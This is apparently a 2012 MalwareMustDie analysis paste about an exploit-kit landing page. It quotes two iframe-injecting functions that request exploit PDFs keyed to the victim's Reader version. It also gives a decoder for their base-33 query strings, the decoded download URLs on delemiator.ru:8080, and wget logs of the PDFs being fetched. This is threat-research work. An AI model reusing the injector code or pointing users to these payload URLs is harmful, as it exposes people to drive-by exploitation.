MalwareMustDie

#MalwareMustDie FLUSH2 - PluginDetect 0.7.9. Nov 25, 2012

Nov 25th, 2012
// There are two PDF-downloader functions, p1() and p2()
  2. // let's fetch the mess...
  3.  
// Landing-page snippet captured verbatim (only comments added): the exact
// query-string layout is the indicator worth matching, so the code is not restyled.
/**
 * Injects an IFRAME that requests the PDF payload from the same-origin path
 * /forum/links/column.php. Every query value except the fixed "xtppbw" field is
 * produced by x(): the constant tokens x("c833f") and x("occ"), and the
 * detected Reader version x(pdfver.join(".")).
 * Depends on x() and pdfver being in scope; pdfver is defined elsewhere on the
 * page (presumably the PluginDetect version array, e.g. [5,0,1,0] per the note below).
 * No return value; the only effect is the DOM insertion and the request it triggers.
 */
function p1()
{
  var d=document.createElement("div");
  // The frame gets no size or style attributes, so it stays visible in the DOM.
  d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
  document.body.appendChild(d);
}
// Second landing-page snippet, captured verbatim (only comments added).
/**
 * Same construction as p1(): injects an IFRAME requesting /forum/links/column.php,
 * but with different parameter names and with x("c") in place of x("occ").
 * The fixed "hgzmul" field carries the same literal as "xtppbw" in p1().
 * Depends on x() and pdfver being in scope (pdfver is defined elsewhere on the page).
 * No return value.
 */
function p2()
{
  var d=document.createElement("div");
  // Same unhidden frame as in p1(); only the query-string layout differs.
  d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
  document.body.appendChild(d);
}
  16.  
// The two IFRAMEs above point at a URL assembled with the function x() from PluginDetect.
// Feeding "c833f", "occ" and "c" through that logic gives the query values,
// in this case "30:1n:1i:1i:33", "3c:30:30" and "30".
// PS: the last parameter is the PDF reader version; use whichever values you want, e.g. the ones above:
// pdfver=[5,0,1,0] is joined into the string "5.0.1.0", which x() turns into 1k:1d:1f:1d:1g:1d:1f
//
// Note, my memo code:
  24.  
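// Re-encode a probe string the way the landing page's x() does, so the
// query-string values seen in p1()/p2() can be reproduced offline.
// Swap the argument for "c833f" or "5.0.1.0" to reproduce the other values.
var a = x("occ");

/**
 * Encode a string the way the exploit kit's landing page does: each UTF-16
 * code unit is written in base 33 and the units are joined with ":".
 * This colon-separated base-33 pattern is what the query strings in the
 * download URLs below consist of.
 * Examples: x("occ") -> "3c:30:30", x("5.0.1.0") -> "1k:1d:1f:1d:1g:1d:1f".
 * Declared with a function statement so the call above works by hoisting,
 * as in the original memo.
 * @param {string} s - string to encode; "" yields ""
 * @returns {string} colon-joined base-33 code units
 */
function x(s)
{
  // Locals are declared here; the original leaked d, i and k as globals.
  var parts = [];
  for (var i = 0; i < s.length; i++)
  {
    var unit = s.charCodeAt(i).toString(33);
    parts.push(unit);
  }
  return parts.join(":");
}

// The encoded value is a query-string token, not JavaScript, so the original
// memo's eval(a) raises a SyntaxError. Its evident purpose was to show the
// value, so it is printed instead.
console.log(a);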
  32.  
  33.  
// In short, substituting the decoded strings into the URL gives the download URLs below:
  35.  
  36. http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
  37. http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
  38.  
  39.  
// Proof of this: the exploit/downloader PDFs fetched from those URLs, as logged below:
  41.  
  42. --17:14:11--  http://delemiator.ru:8080/forum/links/column.php?loh=30:1n:1i:1i:33&gggijbpx=3c:30:30&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu=1k:1d:1f:1d:1g:1d:1f
  43.            => `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  44. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
  45. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
  46. HTTP request sent, awaiting response... 200 OK
  47. Length: 27,836 (27K) [application/pdf]
  48. 17:14:16 (16.21 KB/s) - `column.php@loh=30%3A1n%3A1i%3A1i%3A33&gggijbpx=3c%3A30%3A30&xtppbw=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jbu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [27836/27836]
  49.  
  50. --17:16:32--  http://delemiator.ru:8080/forum/links/column.php?olnvlwxj=30:1n:1i:1i:33&xdhhdvud=30&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu=1k:1d:1f:1d:1g:1d:1f
  51.            => `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  52. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
  53. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
  54. HTTP request sent, awaiting response... 200 OK
  55. Length: 14,769 (14K) [application/pdf]
  56. 17:16:35 (66.79 KB/s) - `column.php@olnvlwxj=30%3A1n%3A1i%3A1i%3A33&xdhhdvud=30&hgzmul=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&ohu=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f' saved [14769/14769]